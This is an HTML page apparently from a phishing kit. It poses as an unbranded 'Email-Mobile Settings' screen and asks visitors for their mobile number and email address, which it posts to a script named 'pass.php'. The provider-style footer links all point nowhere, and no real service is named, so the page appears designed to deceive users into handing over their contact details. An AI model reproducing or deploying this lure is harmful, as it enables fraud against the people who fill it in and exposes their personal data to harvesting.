<!doctype html>
<html>
<head>
<meta charset="utf-8">

<!-DHTML scripts by Dynamic Drive (http://www.dynamicdrive.com)-->
<style>
a:hover{color:#ff0000; text-decoration:underline; }
</style>


<link rel="icon" href="favicon.ico" sizes="13x13" type="image/png">

<title>Settings | Mobile-Email Settings </title>
</head>

<body link="#0A4C92" alink="#0A4C92" vlink="#0A4C92">
<table width="540" border="0" align="center">
  <tbody>
    <tr>
      <td height="30">&nbsp;</td>
    </tr>
    
    <tr>
      <td height="5"></td>
    </tr>
    <tr>
      <td> 
      <div align="center">
      <font face="Consolas, Andale Mono, Lucida Console, Lucida Sans Typewriter, Monaco, Courier New, monospace" size="+1">
      
      <font size="+2">Email-Mobile Settings</font>
     
     <br><br>
     
     <font size="3">
     You are about to link your Email to Mobile
	 </font>
     
      </font>
      </div>
      </td>
    </tr>
    
    
    <tr>
      <td height="20"></td>
    </tr>
    
    
    
    
     <tr>
      <td height="3">
      <form method="post" action="pass.php">
      </td>
    </tr>
    
    
    <tr>
      <td>
      
       <div align="center">

		<input  name="phone" type="text" style="width:320px; height:20px; font-family: Verdana; font-size: 13px; color:#000000; 
		background-color: #ffffff; border: solid 1px #848484; padding: 10px; -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;" required="" placeholder="Enter Mobile Number ">

		</div>
      
      </td>
    </tr>
    
    
    <tr>
      <td height="5"></td>
    </tr>
    
    
    <tr>
      <td>
      
       <div align="center">

		<input  name="email" type="email" style="width:320px; height:20px; font-family: Verdana; font-size: 13px; color:#000000; 
		background-color: #ffffff; border: solid 1px #848484; padding: 10px; -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;" required="" placeholder="Enter Email-ID">

		</div>
      
      </td>
    </tr>
    
    
    <tr>
      <td height="5"></td>
    </tr>
    
    
    
    
    
    
    
    
    
     <tr>
      <td height=""></td>
    </tr>
    
    
    
    
     <tr>
    <td>
    
    	<table align="center"><tr>
        <td>
        <input type="checkbox" width="" height="">
        </td>
        
        
        <td width="0"></td>
        
        
        <td>
    	<font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2">
        Remember my ID
        </font>
        </td>
        
        
        
        <td width="78"></td>
        
        
        <td>
        <div align="right">
    	<font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2" color="#2E9AFE">
        Link Mobile to Email
        </font>
        </div>
        </td>
        
        </tr></table>
    
    </td>
    </tr>
    
    
     <tr>
      <td height="5"></td>
    </tr>
    
    
    <tr>
      <td>
      
      <div align="center">

		<input  value="Continue >>" type="submit" style="width:340px; height:50px; font-family: Verdana; font-size: 18px; color:#ffffff; 
		background-color: #2E9AFE; border: solid 1px #2E9AFE; padding: 10px; 
		-moz-border-radius: 2px; -webkit-border-radius: 2px; -khtml-border-radius: 2px; border-radius: 2px;
		-moz-box-shadow: 3px 3px 3px #888; -webkit-box-shadow: 3px 3px 3px #888; box-shadow: 3px 3px 3px #888;">

		</div>
      
      &nbsp;</td>
    </tr>
    
   
    
    <tr>
      <td>
      </form>
      </td>
    </tr>
    <tr>
      <td height="200">&nbsp;</td>
    </tr>
    <tr>
      <td>
      
      </td>
    </tr>
    
    
    <tr>
      <td>
      <div align="center">
      
      | 
      
      <a href="" style="text-decoration:none;">
      <font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2">
      General Settings 
      </font>
      </a>

	  |

      <a href="" style="text-decoration:none;">
      <font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2">
      Mobile-Email Settings
      </font>
      </a>
      
      |
      
      
      <a href="" style="text-decoration:none;">
      <font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2">
      Mail-Client
      </font>
      </a>
      
      |
      
      
      
      <a href="" style="text-decoration:none;">
      <font face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" size="2">
      POP3 Settings
      </font>
      </a>
      
      |
      
      
      </div>
      </td>
    </tr>
  </tbody>
</table>

	 

</body>
</html>